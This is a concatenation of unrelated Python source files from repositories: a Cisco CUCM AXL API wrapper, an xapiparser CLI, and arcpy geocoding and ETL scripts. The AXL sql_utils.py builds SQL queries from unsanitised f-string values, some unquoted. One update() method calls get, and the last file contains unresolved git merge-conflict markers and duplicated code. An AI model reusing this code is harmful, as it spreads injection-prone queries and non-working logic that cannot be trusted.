supported_methods = ["get", "update"]
def get(self, name="NativeEmergencyCallHandling", returnedTags=None, **kwargs):
get_kwargs = flatten_signature_kwargs(self.get, locals())
return super().get(**get_kwargs)
def update(self, name="NativeEmergencyCallHandling", value="Enabled", **kwargs):
update_kwargs = flatten_signature_kwargs(self.get, locals())
return super().get(**update_kwargs)
class VoiceMailPilot(SimpleAXLAPI):
_factory_descriptor = "voicemail_pilot"
def add(self, dirn, isDefault=False, **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class VoiceMailProfile(DeviceAXLAPI):
_factory_descriptor = "voicemail_profile"
def add(self, name, voiceMailPilot, **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class VpnGateway(SimpleAXLAPI):
_factory_descriptor = "vpn_gateway"
def add(self, name, url, certificates, vpnGateways=None, **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class VpnGroup(SimpleAXLAPI):
_factory_descriptor = "vpn_group"
def add(self, name,
vpnGateways=None,
**kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class VpnProfile(SimpleAXLAPI):
_factory_descriptor = "vpn_profile"
def add(self, name, autoNetworkDetection=False, mtu=1920, failToConnect=30, enableHostIdCheck=True,
clientAuthentication="User and Password", pwdPersistant=False, **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
```
#### File: ciscocucmapi/api/device.py
```python
from .._internal_utils import flatten_signature_kwargs
from .base import DeviceAXLAPI
from .base import SimpleAXLAPI
class CommonDeviceConfig(DeviceAXLAPI):
_factory_descriptor = "common_device_config"
supported_methods = ["model", "create", "add", "get", "list", "update", "remove", "apply", "reset"]
def add(self, name, softkeyTemplateName=None, userLocale=None, **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class CommonPhoneConfig(DeviceAXLAPI):
_factory_descriptor = "common_phone_profile"
supported_methods = ["model", "create", "add", "get", "list", "update", "remove", "apply", "reset"]
def add(self, name, unlockPwd=None, featureControlPolicy=None, **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class CtiRoutePoint(DeviceAXLAPI):
_factory_descriptor = "cti_route_point"
def add(self, name, devicePoolName, product="CTI Route Point", protocol="SCCP", **kwargs):
if "class" not in kwargs: # workaround for restricted 'class' attribute
kwargs["class"] = "CTI Route Point"
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class DefaultDeviceProfile(SimpleAXLAPI):
_factory_descriptor = "default_device_profile"
supported_methods = ["model", "create", "add", "get", "update", "list", "remove", "options"]
def add(self, name, product, phoneButtonTemplate="Universal Device Template Button Layout", softkeyTemplate=None,
protocol="SIP", protocolSide="User", **kwargs):
# the name is not obvious in the UI. It appears to default to a concat of product and protocol.
# it may be useful to log a warning for this...
if "class" not in kwargs: # workaround for restricted 'class' attribute
kwargs["class"] = "Device Profile"
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class DeviceProfile(SimpleAXLAPI):
_factory_descriptor = "udp"
supported_methods = ["model", "create", "add", "get", "update", "list", "remove", "options"]
def add(self, name, product, phoneTemplateName,
protocol="SIP",
**kwargs):
if "class" not in kwargs: # workaround for restricted 'class' attribute
kwargs["class"] = "Device Profile"
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class FeatureControlPolicy(SimpleAXLAPI):
_factory_descriptor = "feature_control_policy"
def add(self, name,
features=None,
**kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class IpPhoneServices(SimpleAXLAPI):
_factory_descriptor = "ip_phone_service"
def add(self, serviceName, asciiServiceName, serviceUrl, secureServiceUrl=None, serviceCategory="XML Service",
serviceType="Standard IP Phone Service", enabled=True, enterpriseSubscription=False, parameters=None,
**kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class Line(DeviceAXLAPI):
_factory_descriptor = "line"
supported_methods = [
"model", "create", "add", "get", "update", "list", "remove", "options", "apply", "restart", "reset"
]
def __init__(self, connector, object_factory):
super().__init__(connector, object_factory)
def add(self, pattern, routePartitionName,
usage="Device",
**kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class NetworkAccessProfile(SimpleAXLAPI):
_factory_descriptor = "network_access_profile"
def add(self, name, vpnRequired="Default", proxySettings="None", proxyHostname="", **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class Phone(DeviceAXLAPI):
_factory_descriptor = "phone"
supported_methods = [
"model", "create", "add", "get", "list", "update", "remove",
"options", "wipe", "lock",
"apply", "restart", "reset",
]
@staticmethod
def _check_confidential_access(confidentialAccess):
"""Workaround for AXL defect not accepting None for 'confidentialAccessMode'"""
if not confidentialAccess['confidentialAccessMode']:
confidentialAccess['confidentialAccessMode'] = ''
return confidentialAccess
def add(self, name, product, devicePoolName, locationName="Hub_None", protocol="SIP",
commonPhoneConfigName="Standard Common Phone Profile", **kwargs):
if "class" not in kwargs: # workaround for restricted 'class' attribute
kwargs["class"] = "Phone"
add_kwargs = flatten_signature_kwargs(self.add, locals())
try:
add_kwargs['confidentialAccess'] = self._check_confidential_access(add_kwargs['confidentialAccess'])
except KeyError:
pass
return super().add(**add_kwargs)
def update(self, **kwargs):
try:
kwargs['confidentialAccess'] = self._check_confidential_access(kwargs['confidentialAccess'])
except KeyError:
pass
return super().update(**kwargs)
def wipe(self, **kwargs):
"""Allows Cisco's newer Android-based devices, like the Cisco DX650,
to be remotely reset to factory defaults, removing user specific settings and data.
:param kwargs: phone name or uuid
:return: None
"""
# check_identifiers(self._wsdl_objects["name_and_guid_model"], **kwargs)
return self._serialize_axl_object("wipe", **kwargs)
def lock(self, **kwargs):
return self._serialize_axl_object("lock", **kwargs)
class PhoneButtonTemplate(DeviceAXLAPI):
_factory_descriptor = "phone_button_template"
supported_methods = ["model", "create", "add", "get", "update", "list", "remove", "apply", "restart"]
def add(self, name, basePhoneTemplateName, **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class PhoneSecurityProfile(DeviceAXLAPI):
_factory_descriptor = "phone_security_profile"
supported_methods = ["model", "create", "add", "get", "update", "list", "remove", "apply", "restart"]
def add(self, name, phoneType="Universal Device Template", protocol="Protocol Not Specified",
deviceSecurityMode=None, authenticationMode="By Null String", keySize=1024, transportType="TCP+UDP",
sipPhonePort=5060, **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class RecordingProfile(SimpleAXLAPI):
_factory_descriptor = "recording_profile"
def add(self, name, recorderDestination, recordingCssName=None, **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class RemoteDestination(SimpleAXLAPI):
_factory_descriptor = "remote_destination"
def add(self, destination, ownerUserId, name=None, enableUnifiedMobility=True, enableMobileConnect=True,
isMobilePhone=True, remoteDestinationProfileName=None, dualModeDeviceName=None, lineAssociations=None,
**kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class RemoteDestinationProfile(SimpleAXLAPI):
_factory_descriptor = "rdp"
def add(self, name, devicePoolName, userId, rerouteCallingSearchSpaceName=None, callingSearchSpaceName=None,
lines=None, product="Remote Destination Profile", protocol="Remote Destination", protocolSide="User",
**kwargs):
if "class" not in kwargs: # workaround for restricted 'class' attribute
kwargs["class"] = "Remote Destination Profile"
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class SdpTransparencyProfile(SimpleAXLAPI):
_factory_descriptor = "sdp_transparency_profile"
def add(self, name, attributeSet, **kwargs):
if "class" not in kwargs:
kwargs["class"] = "Trunk"
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class SipTrunk(DeviceAXLAPI):
_factory_descriptor = "sip_trunk"
def add(self, name, devicePoolName, destinations, product="SIP Trunk", locationName="Hub_None", protocol="SIP",
securityProfileName="Non Secure SIP Trunk Profile", sipProfileName="Standard SIP Profile",
presenceGroupName="Standard Presence Group", protocolSide="Network", **kwargs):
if "class" not in kwargs:
kwargs["class"] = "Trunk"
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class SipProfile(DeviceAXLAPI):
_factory_descriptor = "sip_profile"
supported_methods = ["model", "create", "add", "get", "update", "list", "remove", "options", "apply", "restart"]
def add(self, name, sdpTransparency="Pass all unknown SDP attributes", **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class SipTrunkSecurityProfile(DeviceAXLAPI):
_factory_descriptor = "sip_trunk_security_profile"
supported_methods = ["model", "create", "add", "get", "update", "list", "remove", "apply", "reset"]
def add(self, name, acceptPresenceSubscription=False, acceptOutOfDialogRefer=False,
acceptUnsolicitedNotification=False, allowReplaceHeader=False, transmitSecurityStatus=False, **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class SoftKeyTemplate(DeviceAXLAPI):
_factory_descriptor = "softkey_template"
supported_methods = ["model", "create", "add", "get", "update", "list", "remove", "apply", "restart"]
def add(self, name, description,
baseSoftkeyTemplateName="Standard User",
**kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class SoftKeySet(SimpleAXLAPI):
_factory_descriptor = "softkey_set"
supported_methods = ["get", "update"]
class UniversalDeviceTemplate(SimpleAXLAPI):
_factory_descriptor = "udt"
def add(self, name, devicePool, directoryNumber=None, lineLabel=None, displayCallerId=None, callingSearchSpace=None,
sipProfile="Standard SIP Profile", commonPhoneProfile="Standard Common Phone Profile",
phoneButtonTemplate="Universal Device Template Button Layout",
deviceSecurityProfile="Universal Device Template - Model-independent Security Profile",
blfPresenceGroup="Standard Presence group", location="Hub_None", **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class UniversalLineTemplate(SimpleAXLAPI):
_factory_descriptor = "ult"
def add(self, name, routePartition=None, lineDescription=None, callingSearchSpace=None, voiceMailProfile=None,
alertingName=None, rejectAnonymousCall=False, # override inconsistency between normal line add and ULT
blfPresenceGroup="Standard Presence group", **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class WifiHotspot(SimpleAXLAPI):
_factory_descriptor = "wifi_hotspot"
def add(self, name, ssidPrefix, frequencyBand="Auto", userModifiable="Allowed", authenticationMethod="None",
**kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class WLANProfile(SimpleAXLAPI):
_factory_descriptor = "wlan_profile"
def add(self, name, ssid, frequencyBand="Auto", userModifiable="Allowed", authMethod="EAP-FAST",
networkAccessProfile=None, userName="", password="", **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class WlanProfileGroup(SimpleAXLAPI):
_factory_descriptor = "wlan_profile_group"
def add(self, name,
members=None,
**kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
```
#### File: src/ciscocucmapi/sql_utils.py
```python
from .helpers import extract_pkid_from_uuid
def get_device_pkid(axl_connector, device_name):
"""Get a device pkid from the device name"""
sql_statement = f"select pkid from device where name={device_name}"
return axl_connector.sql.query(sql_statement)
def get_enduser_pkid(axl_connector, userid):
"""Get an enduser pkid from the enduser userid"""
sql_statement = f"select pkid from enduser where userid={userid}"
return axl_connector.sql.query(sql_statement)
def associate_device_to_enduser(axl_connector, enduser_pkid_or_uuid, device_pkid_or_uuid, tkuserassociation=1):
"""Insert row into enduserdevicemap table to add user/device association"""
enduser_pkid = extract_pkid_from_uuid(enduser_pkid_or_uuid)
device_pkid = extract_pkid_from_uuid(device_pkid_or_uuid)
sql_statement = f"insert into enduserdevicemap (fkenduser, fkdevice, defaultprofile, tkuserassociation)" \
f"values ('{enduser_pkid}','{device_pkid}','f','{tkuserassociation}')"
return axl_connector.sql.update(sql_statement)
def associate_enduser_to_user_group(axl_connector, enduser_pkid_or_uuid, dirgroup_pkid_or_uuid):
"""Insert row into enduserdirgroupmap table to add enduser/user group association"""
enduser_pkid = extract_pkid_from_uuid(enduser_pkid_or_uuid)
dirgroup_pkid = extract_pkid_from_uuid(dirgroup_pkid_or_uuid)
sql_statement = f"insert into enduserdirgroupmap (fkenduser, fkdirgroup) " \
f"values ('{enduser_pkid}', '{dirgroup_pkid}')"
return axl_connector.sql.update(sql_statement)
def get_dn_pkid(axl_connector, dnorpattern, tkpatternusage=2):
"""Get dn pkid from the dnorpattern from numplan table.
Note:
Does not ensure uniqueness as does not include join on route partition table
:param axl_connector: (UCMAXLConnector) axl connector
:param (str) dnorpattern: pattern or DN
:param (int) tkpatternusage: defaults to 2 for DNs
:return: (str) pkid
"""
sql_statement = f"select pkid from numplan " \
f"where dnorpattern={dnorpattern} "\
f"and tkpatternusage={tkpatternusage}"
return axl_connector.sql.query(sql_statement)
def get_service_parameter_details(axl_connector, parameter_name):
"""Get individual service parameters tuple"""
sql_statement = f"select * from processconfig " \
f"where paramname = '{parameter_name}'"
return axl_connector.sql.query(sql_statement)
def update_service_parameter(axl_connector, parameter_name, parameter_value):
"""Update service parameter with specified value"""
sql_statement = f"update processconfig " \
f"set paramvalue = '{parameter_value}' " \
f"where paramname = '{parameter_name}'"
return axl_connector.sql.update(sql_statement)
def ldap_sync(axl_connector, name=None, uuid=None):
"""SQL-based LDAP sync fallback method for AXL versions not supporting doLdapSync"""
try:
return axl_connector.sql.update(
sql_statement=f"update directorypluginconfig set syncnow = '1' where name = '{name}'"
)
except TypeError:
name = extract_pkid_from_uuid(
axl_connector.ldap_directory.get(uuid=uuid, returnedTags={"name": ""})
)
return ldap_sync(axl_connector, name=name)
``` |
{
"source": "jonathanelscpt/xapiparser",
"score": 2
} |
#### File: src/xapiparser/cli.py
```python
import argparse
import lxml.etree as etree
from xapiparser import __version__
from xapiparser import parse
parser = argparse.ArgumentParser(description='xAPI ssh command parser.')
parser.add_argument('command', metavar='cmd', nargs=1,
help="xAPI ssh command")
parser.add_argument('--version', action='version',
version='%(prog)s v{version}'.format(version=__version__))
def main(args=None):
args = parser.parse_args(args=args)
print(etree.tostring(parse(args.command[0]), pretty_print=True, encoding='unicode'))
```
#### File: xapiparser/tests/conftest.py
```python
import lxml.etree as etree
import pytest
@pytest.fixture
def strip_whitespace():
return etree.XMLParser(remove_blank_text=True)
``` |
{
"source": "jonathanengelbert/automated_geocoding",
"score": 2
} |
#### File: automated_geocoding/production/geocoding_v2.py
```python
import arcpy
arcpy.env.overwriteOutput = True
arcpy.env.workspace = r"I:\GIS\OASIS\Geocoder\geocoder.gdb"
def geocode():
try:
# Local variables:
transformed_xlsx = "I:\\GIS\\OASIS\\Geocoder\\transformed.xlsx"
transfomed = "I:\\GIS\\OASIS\\Geocoder\\geocoder.gdb\\transfomed"
AddressLocator_Master_Address_Database = "I:\\GIS\\OASIS\\AddressLocators\\AddressLocator_Master_Address_Database"
geocoded_addresses = "I:\\GIS\\OASIS\\Geocoder\\geocoder.gdb\\geocoded_addresses"
geocoder_gdb = "I:\\GIS\\OASIS\\Geocoder\\geocoder.gdb"
geocoded_addresses_failed = "geocoded_addresses_failed"
unmatched_xls = "I:\\GIS\\OASIS\\Geocoder\\unmatched.xls"
unmatched = "I:\\GIS\\OASIS\\Geocoder\\geocoder.gdb\\unmatched"
unmatched__3_ = unmatched
AddressLocator_Street_Centerlines__2_ = "I:\\GIS\\OASIS\\AddressLocators\\AddressLocator_Street_Centerlines"
geocoded_street_centerlines = "I:\\GIS\\OASIS\\Geocoder\\geocoder.gdb\\geocoded_street_centerlines"
geocoded_street_centerlines_successful = "geocoded_street_centerlines_successful"
geocoded_street_centerlines_successful__2_ = geocoded_street_centerlines_successful
geocoded_street_centerlines_successful__3_ = geocoded_street_centerlines_successful__2_
geocoder_gdb__2_ = "I:\\GIS\\OASIS\\Geocoder\\geocoder.gdb"
geocoded_master_successful = "geocoded_master_successful"
geocoded_master_successful__2_ = geocoded_master_successful
geocoded_master_successful__4_ = geocoded_master_successful__2_
geocoder_eas = "I:\\GIS\\OASIS\\Geocoder\\geocoder.gdb\\geocoder_eas"
final = "I:\\GIS\\OASIS\\Geocoder\\geocoder.gdb\\final"
# Process: Excel To Table
try:
arcpy.ExcelToTable_conversion(transformed_xlsx, transfomed)
except Exception as e:
print(e)
# Process: Geocode Addresses
try:
arcpy.GeocodeAddresses_geocoding(transfomed,
AddressLocator_Master_Address_Database,
"Key transformed_address VISIBLE NONE",
geocoded_addresses, "STATIC", "", "")
except Exception as e:
print(e)
# Process: Make Feature Layer
try:
arcpy.MakeFeatureLayer_management(geocoded_addresses,
geocoded_addresses_failed,
"Status = 'U'", geocoder_gdb,
"ObjectID OBJECTID VISIBLE NONE;Shape Shape VISIBLE NONE;Status Status VISIBLE NONE;Score Score VISIBLE NONE;Match_type Match_type VISIBLE NONE;Match_addr Match_addr VISIBLE NONE;X X VISIBLE NONE;Y Y VISIBLE NONE;Xmin Xmin VISIBLE NONE;Xmax Xmax VISIBLE NONE;Ymin Ymin VISIBLE NONE;Ymax Ymax VISIBLE NONE;Addr_type Addr_type VISIBLE NONE;ARC_Single_Line_Input ARC_Single_Line_Input VISIBLE NONE")
except Exception as e:
print(e)
# Process: Table To Excel
try:
arcpy.TableToExcel_conversion(geocoded_addresses_failed, unmatched_xls,
"NAME", "CODE")
except Exception as e:
print(e)
# Process: Excel To Table (2)
arcpy.ExcelToTable_conversion(unmatched_xls, unmatched, "")
# Process: Delete Field
arcpy.DeleteField_management(unmatched,
"OBJECTID_1;Status;Score;Match_type;Match_addr;X;Y;Xmin;Xmax;Ymin;Ymax;Addr_type;ARC_Single_Line_Input;ARC_SingleKey")
# Process: Geocode Addresses (2)
arcpy.GeocodeAddresses_geocoding(unmatched__3_,
AddressLocator_Street_Centerlines__2_,
"'Full Address' transformed_address VISIBLE NONE",
geocoded_street_centerlines, "STATIC", "",
"")
# Process: Make Feature Layer (3)
arcpy.MakeFeatureLayer_management(geocoded_street_centerlines,
geocoded_street_centerlines_successful,
"", "",
"ObjectID ObjectID VISIBLE NONE;Shape Shape VISIBLE NONE;Status Status VISIBLE NONE;Score Score VISIBLE NONE;Match_type Match_type VISIBLE NONE;Match_addr Match_addr VISIBLE NONE;Side Side VISIBLE NONE;Ref_ID Ref_ID VISIBLE NONE;User_fld User_fld VISIBLE NONE;Addr_type Addr_type VISIBLE NONE;ARC_Single_Line_Input ARC_Single_Line_Input VISIBLE NONE")
# Process: Add Field (2)
arcpy.AddField_management(geocoded_street_centerlines_successful,
"geocoder", "TEXT", "", "", "", "", "NULLABLE",
"NON_REQUIRED", "")
# Process: Calculate Field (2)
arcpy.CalculateField_management(geocoded_street_centerlines_successful__2_,
"geocoder", "classifyGeocoder(!Status!)",
"PYTHON",
"def classifyGeocoder(Status):\\n if Status == \"M\" or Status == \"T\":\\n return \"SC\"\\n else:\\n return \"U\"")
# Process: Make Feature Layer (2)
arcpy.MakeFeatureLayer_management(geocoded_addresses,
geocoded_master_successful,
"Status = 'M' OR Status = 'T'",
geocoder_gdb__2_,
"ObjectID OBJECTID VISIBLE NONE;Shape Shape VISIBLE NONE;Status Status VISIBLE NONE;Score Score VISIBLE NONE;Match_type Match_type VISIBLE NONE;Match_addr Match_addr VISIBLE NONE;X X VISIBLE NONE;Y Y VISIBLE NONE;Xmin Xmin VISIBLE NONE;Xmax Xmax VISIBLE NONE;Ymin Ymin VISIBLE NONE;Ymax Ymax VISIBLE NONE;Addr_type Addr_type VISIBLE NONE;ARC_Single_Line_Input ARC_Single_Line_Input VISIBLE NONE")
# Process: Add Field
arcpy.AddField_management(geocoded_master_successful, "geocoder", "TEXT",
"", "", "20", "", "NULLABLE", "NON_REQUIRED", "")
# Process: Calculate Field
arcpy.CalculateField_management(geocoded_master_successful__2_, "geocoder",
"\"EAS\"", "PYTHON", "")
# Process: Copy Features
arcpy.CopyFeatures_management(geocoded_master_successful__4_, geocoder_eas,
"", "0", "0", "0")
# Process: Merge
print("SUCCEDED")
fieldmappings = arcpy.FieldMappings()
fieldmappings.addTable(transfomed)
arcpy.Merge_management(
"I:\\GIS\\OASIS\\Geocoder\\geocoder.gdb\\geocoder_eas; geocoded_street_centerlines_successful",
final, fieldmappings)
print("GEOCODING SUCCESSFUL")
except Exception as e:
print("ERROR")
print(e)
if __name__ == "__main__":
geocode()
print("\nAddresses Processed")
exit()
``` |
{
"source": "jonathanengelbert/ETLs",
"score": 2
} |
#### File: jonathanengelbert/ETLs/GreenConnectionsBSP_in_gdb.py
```python
<<<<<<< HEAD:GreenConnectionsBSP_in_gdb.py
#This script pulls Better Streets plan and Green Connections from the Planning SDE into TIM.
#Last modified: 11/21/2017 by <NAME>
#
### No Known Issues
################################################################################################
import arcpy
from arcpy import env
import sys, string, os, time, datetime
# SET TO OVERWRITE
arcpy.env.overwriteOutput = True
# Logging script
myStartDate = str(datetime.date.today())
myStartTime = time.clock()
theStartTime = time.ctime()
print theStartTime
try:
myStartDate = str(datetime.date.today())
myStartTime = time.clock()
theStartTime = time.ctime()
# thisfile = os.path.realpath(__file__)
file = open("C:/ETLs/TIM/TIMUpdates/logs/" + myStartDate + "BSP_GreenConnections" + ".txt", "w")
file.write(theStartTime + "\n")
when =datetime.date.today()
theDate = when.strftime("%d")
theDay=when.strftime("%A")
print theDay
################################################################################################
# STEP ONE
# COPYING FROM SDE TO LOCAL STAGING FOLDER: SET NAMES AND PATHS AND COPY
# filepath for all copied files:
staging_gdb = "\\\\CP-GIS-SVR1\\arcgisserver\\DataAndMXDs\\TIMReady\\GreenConnections.gdb\\"
# better streets plan
try:
bsp_sde = "Database Connections\\CITYPLAN-03SDE.sde\\GISDATA.BetterStreetsPlan"
bsp_local_1 = "bsp_1"
arcpy.CopyFeatures_management(bsp_sde, staging_gdb + bsp_local_1)
print "BSP copied from SDE to staging folder"
file.write(str(time.ctime()) +": copied files - BSP"+ "\n")
except:
file.write(str(time.ctime()) +": FAILED TO COPY - BSP"+ "\n")
# green connections
gc_sde = "Database Connections\\CITYPLAN-03SDE.sde\\GISDATA.GreenConnectionsNetwork"
print "Green Connections loaded from " + gc_sde
gc_layername = "gc_layer" # make into layer to get selection
arcpy.MakeFeatureLayer_management (gc_sde, gc_layername,""" "GC_RT_NME5" <> ' ' """, "", "")
gc_local_1 = "gc_1"
arcpy.CopyFeatures_management(gc_layername, staging_gdb + gc_local_1)
file.write(str(time.ctime()) +": copied green connections"+ "\n")
print "Saved to " + gc_local_1
################################################################################################
# STEP TWO
# GEOPROCESSING
# Project both layers
print "Reprojecting BSP"
bsp_local_2 = "bsp_2"
webmercator = arcpy.SpatialReference(3857) # This is WGS_1984_Web_Mercator_Auxiliary_Sphere WKID: 3857 Authority: EPSG
arcpy.Project_management(staging_gdb + bsp_local_1, staging_gdb + bsp_local_2, webmercator)
print "BSP reprojected to " + bsp_local_2
file.write(str(time.ctime()) +": projected1"+ "\n")
print "Reprojecting GC"
gc_local_2 = "gc_2"
webmercator = arcpy.SpatialReference(3857)
arcpy.Project_management(staging_gdb + gc_local_1, staging_gdb + gc_local_2, webmercator)
print "GC reprojected to " + gc_local_2
file.write(str(time.ctime()) +": projected2"+ "\n")
# process BSP data
# load table of sidewalk widths
BSP_sidewalks = "\\\\CP-GIS-SVR1\\arcgisserver\\DataAndMXDs\\TIMReady\\BSP_sidewalks_OID.dbf"
print "BSP table loaded"
# add field for final street type
arcpy.AddField_management(staging_gdb + bsp_local_2, "finaltype", "TEXT", "", "", "", "", "NULLABLE", "NON_REQUIRED", "")
print "BSP fields added"
file.write(str(time.ctime()) +": BSP fields added"+ "\n")
# Process: Calculate Field
arcpy.CalculateField_management(staging_gdb + bsp_local_2, "finaltype", "bsp( !BSP_Class!, !Special!)", "PYTHON", "def bsp(BSP_Class,Special):\\n if Special != 'N':\\n return Special\\n else:\\n return BSP_Class")
print "BSP fields calculated"
file.write(str(time.ctime()) +": BSP field calc"+ "\n")
# Dissolve BSP (dissolve before join to make join faster)
bsp_local_3 = "BetterStreetsPlan_TIM"
arcpy.Dissolve_management(staging_gdb + bsp_local_2, staging_gdb + bsp_local_3, ["STREETNAME","BSP_Class","Special","finaltype"], "", "", "")
print "BSP dissolved"
print "BSP joining fields..."
file.write(str(time.ctime()) +": dissolved"+ "\n")
# Join fields from sidewalk table
arcpy.JoinField_management(staging_gdb + bsp_local_3, "finaltype", BSP_sidewalks, "finaltype", "side_min;side_rec")
print "BSP fields joined"
file.write(str(time.ctime()) +": joined"+ "\n")
# process Green Connections
# Dissolve Green Connections
gc_local_3 = "GreenConnectionsTIM_dissolve"
arcpy.Dissolve_management(staging_gdb + gc_local_2, staging_gdb + gc_local_3, ["STREETNAME","GC_RT_NME5","GC_RT_NUM5"], "", "", "")
print "GC dissolved"
file.write(str(time.ctime()) +": dissolved 2"+ "\n")
# function to create buffers
def arcpybuffer(buffer_name,original_name,buffer_dist,dissolve_opt,dissolve_fld):
print("\n")
print "Buffering " + buffer_name
# bufferlist.append(buffer_name)
staging_name = staging_gdb + original_name
filename_buffer = staging_gdb + buffer_name
arcpy.Buffer_analysis(staging_name, filename_buffer, buffer_dist, "", "", dissolve_opt, dissolve_fld)
# Buffer BSP
arcpybuffer("betterstreetsbuffer",bsp_local_3,"250 Feet","","")
file.write(str(time.ctime()) +": buffered 1"+ "\n")
# Buffer GC
arcpybuffer("greenconnectionsbuffer",gc_local_3,"250 Feet","","")
file.write(str(time.ctime()) +": buffered2"+ "\n")
print("FINISHED SUCCESSFULLY")
file.write(str(time.ctime()) +": FINISHED SUCCESSFULLY"+ "\n")
file.close()
################################################################################################
except Exception,e:
print str(e)
print "Ended badly"
file.write(str(time.ctime()) +": Ended badly")
file.write(str(e))
file.close()
print arcpy.GetMessages()
print arcpy.GetMessages(2)
print arcpy.GetMessages(1)
myEndTime = time.clock()
theTime = myEndTime - myStartTime
theEndTime = time.ctime()
theMinutes = theTime / 60
print arcpy.GetMessages(2)
print arcpy.GetMessages(1)
myEndTime = time.clock()
theTime = myEndTime - myStartTime
theEndTime = time.ctime()
theMinutes = theTime / 60
=======
#This script pulls Better Streets plan and Green Connections from the Planning SDE into TIM.
#Last modified: 11/21/2017 by <NAME>
#
### No Known Issues
################################################################################################
import arcpy
from arcpy import env
import sys, string, os, time, datetime
# SET TO OVERWRITE
arcpy.env.overwriteOutput = True
# Logging script
myStartDate = str(datetime.date.today())
myStartTime = time.clock()
theStartTime = time.ctime()
print theStartTime
try:
myStartDate = str(datetime.date.today())
myStartTime = time.clock()
theStartTime = time.ctime()
# thisfile = os.path.realpath(__file__)
file = open("C:/ETLs/TIM/TIMUpdates/logs/" + myStartDate + "BSP_GreenConnections" + ".txt", "w")
file.write(theStartTime + "\n")
when =datetime.date.today()
theDate = when.strftime("%d")
theDay=when.strftime("%A")
print theDay
################################################################################################
# STEP ONE
# COPYING FROM SDE TO LOCAL STAGING FOLDER: SET NAMES AND PATHS AND COPY
# filepath for all copied files:
staging_gdb = "\\\\CP-GIS-SVR1\\arcgisserver\\DataAndMXDs\\TIMReady\\GreenConnections.gdb\\"
# better streets plan
try:
bsp_sde = "Database Connections\\CITYPLAN-03SDE.sde\\GISDATA.BetterStreetsPlan"
bsp_local_1 = "bsp_1"
arcpy.CopyFeatures_management(bsp_sde, staging_gdb + bsp_local_1)
print "BSP copied from SDE to staging folder"
file.write(str(time.ctime()) +": copied files - BSP"+ "\n")
except:
file.write(str(time.ctime()) +": FAILED TO COPY - BSP"+ "\n")
# green connections
gc_sde = "Database Connections\\CITYPLAN-03SDE.sde\\GISDATA.GreenConnectionsNetwork"
print "Green Connections loaded from " + gc_sde
gc_layername = "gc_layer" # make into layer to get selection
arcpy.MakeFeatureLayer_management (gc_sde, gc_layername,""" "GC_RT_NME5" <> ' ' """, "", "")
gc_local_1 = "gc_1"
arcpy.CopyFeatures_management(gc_layername, staging_gdb + gc_local_1)
file.write(str(time.ctime()) +": copied green connections"+ "\n")
print "Saved to " + gc_local_1
################################################################################################
# STEP TWO
# GEOPROCESSING
# Project both layers
print "Reprojecting BSP"
bsp_local_2 = "bsp_2"
webmercator = arcpy.SpatialReference(3857) # This is WGS_1984_Web_Mercator_Auxiliary_Sphere WKID: 3857 Authority: EPSG
arcpy.Project_management(staging_gdb + bsp_local_1, staging_gdb + bsp_local_2, webmercator)
print "BSP reprojected to " + bsp_local_2
file.write(str(time.ctime()) +": projected1"+ "\n")
print "Reprojecting GC"
gc_local_2 = "gc_2"
webmercator = arcpy.SpatialReference(3857)
arcpy.Project_management(staging_gdb + gc_local_1, staging_gdb + gc_local_2, webmercator)
print "GC reprojected to " + gc_local_2
file.write(str(time.ctime()) +": projected2"+ "\n")
# process BSP data
# load table of sidewalk widths
BSP_sidewalks = "\\\\CP-GIS-SVR1\\arcgisserver\\DataAndMXDs\\TIMReady\\BSP_sidewalks_OID.dbf"
print "BSP table loaded"
# add field for final street type
arcpy.AddField_management(staging_gdb + bsp_local_2, "finaltype", "TEXT", "", "", "", "", "NULLABLE", "NON_REQUIRED", "")
print "BSP fields added"
file.write(str(time.ctime()) +": BSP fields added"+ "\n")
# Process: Calculate Field
arcpy.CalculateField_management(staging_gdb + bsp_local_2, "finaltype", "bsp( !BSP_Class!, !Special!)", "PYTHON", "def bsp(BSP_Class,Special):\\n if Special != 'N':\\n return Special\\n else:\\n return BSP_Class")
print "BSP fields calculated"
file.write(str(time.ctime()) +": BSP field calc"+ "\n")
